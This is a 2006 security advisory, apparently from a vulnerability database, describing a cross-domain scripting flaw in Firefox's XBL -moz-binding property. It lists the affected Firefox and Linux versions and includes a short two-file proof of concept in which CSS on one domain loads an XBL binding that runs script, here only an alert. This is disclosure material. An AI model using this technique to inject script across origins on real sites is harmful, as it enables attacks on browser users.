| Title | Mozilla Firefox XBL -MOZ-BINDING Property Cross-Domain Scripting Vulnerability |
| Published | 2006-01-30-12:00AM |
| Updated | 2006-01-30-09:09PM |
| Class | Origin Validation Error |
| CVE | |
| Remote | Yes |
| Local | No |
| Credit | Reported by Chris Thomas (CTho) <cst@andrew.cmu.edu>. |
| Vulnerable |
Mozilla Firefox 1.5 beta 2
Mozilla Firefox 1.5 beta 1
Mozilla Firefox 1.5
Mozilla Firefox 1.0.7
Mozilla Firefox 1.0.6
Mozilla Firefox 1.0.5
Mozilla Firefox 1.0.4
Mozilla Firefox 1.0.3
Gentoo Linux
Mozilla Firefox 1.0.2
MandrakeSoft Linux Mandrake 10.2 x86_64
MandrakeSoft Linux Mandrake 10.2
RedHat Desktop 4.0
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux AS 4
Mozilla Firefox 1.0.1
RedHat Fedora Core3
Mozilla Firefox 1.0
Gentoo Linux
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1 x86_64
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
Slackware Linux 10.1
Slackware Linux 10.0
Slackware Linux 9.1
Slackware Linux current
|
| Not Vulnerable |
|
| Code |
The following proof of concept examples are available:

http://domain1/path/to/page.html :

    <html>
    <head>
    <style>
    body {
      -moz-binding: url("http://domain2/path/to/xbl.xml#xss");
    }
    </style>
    </head>
    <body>
    </body>
    </html>

http://domain2/path/to/xbl.xml :

    <?xml version="1.0"?>
    <bindings xmlns="http://www.mozilla.org/xbl"
              xmlns:html="http://www.w3.org/1999/xhtml">
      <binding id="xss">
        <implementation>
          <constructor>
            alert("XBL XSS");
          </constructor>
        </implementation>
      </binding>
    </bindings>

https://bugzilla.mozilla.org/attachment.cgi?id=209241
|
Copyright 2007,
SecurityDot
Sat, 19 Dec 2009 01:25:25 +0000